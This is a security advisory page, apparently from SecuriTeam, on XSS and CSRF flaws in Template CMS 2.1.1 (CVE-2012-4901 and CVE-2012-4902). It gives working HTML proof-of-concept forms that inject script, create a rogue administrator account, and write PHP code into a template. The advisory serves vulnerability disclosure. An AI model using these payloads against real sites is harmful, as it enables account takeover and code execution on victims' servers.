Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2012-4902 to a friend New vulnerability? New tool? Tell us	CVE-2012-4902 Template CMS Cross-Site Scripting and Cross-Site Request Forgery Vulnerability     Credit: The original article can be found at: https://www.htbridge.com/advisory/HTB23115 Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2012-4902 Details Check for CVE-2012-4902 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Template CMS 2.1.1 1) Cross-Site Scripting (XSS) in Template CMS: CVE-2012-4901 Input passed via the "themes_editor" POST parameter to /admin/index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. The following PoC (Proof of Concept) demonstrates the vulnerability: <form action="http://[host]/admin/index.php?action=add_template&id=themes"; method="post"> <input type="hidden" name="themes_editor" value='</textarea><script>alert(document.cookie);</script>' /> <input type="hidden" name="themes_editor_name" value='' /> <input type="hidden" name="add_template" value='' /> <input type="submit" id="btn"> </form> 2) Cross-Site Request Forgery (CSRF) in Template CMS: CVE-2012-4902 The application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary PHP code. An attacker has to trick a logged-in administrator to visit a malicious web page containing the following code that will add a new administrator to the CMS: <form action="http://[host]/admin/index.php?id=system&sub_id=users&action=add"; method="post"> <input type="hidden" name="login" value='newadmin' /> <input type="hidden" name="password" value='password' /> <input type="hidden" name="email" value='newadmin () mail com' /> <input type="hidden" name="role" value='admin' /> <input type="hidden" name="register" value='' /> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script> The second PoC adds arbitrary PHP code (phpinfo() in our case) into CMS's page: <form action="http://[host]/admin/index.php?id=themes&action=edit_template&file=aboutTemplate.php"; method="post"> <input type="hidden" name="themes_editor_name" value='about' /> <input type="hidden" name="themes_editor" value='<? phpinfo(); ?>' /> <input type="hidden" name="old_name" value="about" /> <input type="hidden" name="edit_template" value='' /> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script> The phpinfo() function will be executed [if allowed by web server configuration] on the following web page:http://[vulnerable_host]/about CVE Information: CVE-2012-4901 CVE-2012-4902 Disclosure Timeline: Vendor Notification: September 12, 2012 Public Disclosure: October 3, 2012  Comments on CVE-2012-4902:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®